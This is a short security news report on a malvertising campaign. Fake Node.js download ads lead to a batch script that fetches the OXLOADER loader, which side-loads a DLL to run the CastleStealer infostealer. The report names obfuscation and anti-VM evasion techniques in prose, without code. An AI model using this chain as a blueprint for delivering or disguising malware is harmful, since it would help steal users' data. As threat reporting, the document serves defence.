Cybersecurity experts have identified a new malware loader, dubbed OXLOADER, which is being used to distribute the CastleStealer information-stealing malware. This campaign leverages malicious Google Ads to lure users into downloading the malware.
The attack begins when users search for terms like “lts version of node.js” on Google. Malicious ads, appearing under the verified name “ВОЛОДИМИР ТЕРЕЩЕНКО,” redirect users to a counterfeit website, node-js[.]prentiva99[.]info. It’s unclear whether this advertiser account is directly linked to the threat actors or if it’s a front or purchased identity. Google removed the advertiser account and its associated campaigns on May 14, 2026.
Once on the fake site, users are prompted to download a batch script hosted on Storj, a decentralized cloud storage platform. This script displays a fake installation wizard while covertly executing a PowerShell command to download and run OXLOADER with elevated privileges, triggering a Windows User Account Control (UAC) prompt.
OXLOADER employs DLL side-loading to execute a malicious DLL, which decrypts and runs the CastleStealer payload. To evade detection, OXLOADER utilizes advanced obfuscation techniques, including control-flow flattening, mixed Boolean-Arithmetic, and self-modifying decryption stubs. It also implements anti-virtual machine measures to avoid sandbox analysis.
CastleStealer, a .NET-based information stealer, has been previously distributed alongside CastleLoader in campaigns masquerading as free image-editing tools. The current campaign, codenamed REF8372, appears to be financially motivated and likely operated by Russian-speaking actors, as indicated by exclusions designed to prevent infections in the Commonwealth of Independent States (CIS) region.
The emergence of OXLOADER highlights the evolving tactics of cybercriminals who exploit legitimate platforms like Google Ads and Storj to distribute malware. This underscores the importance of vigilance when downloading software and the need for robust cybersecurity measures to detect and prevent such sophisticated attacks.
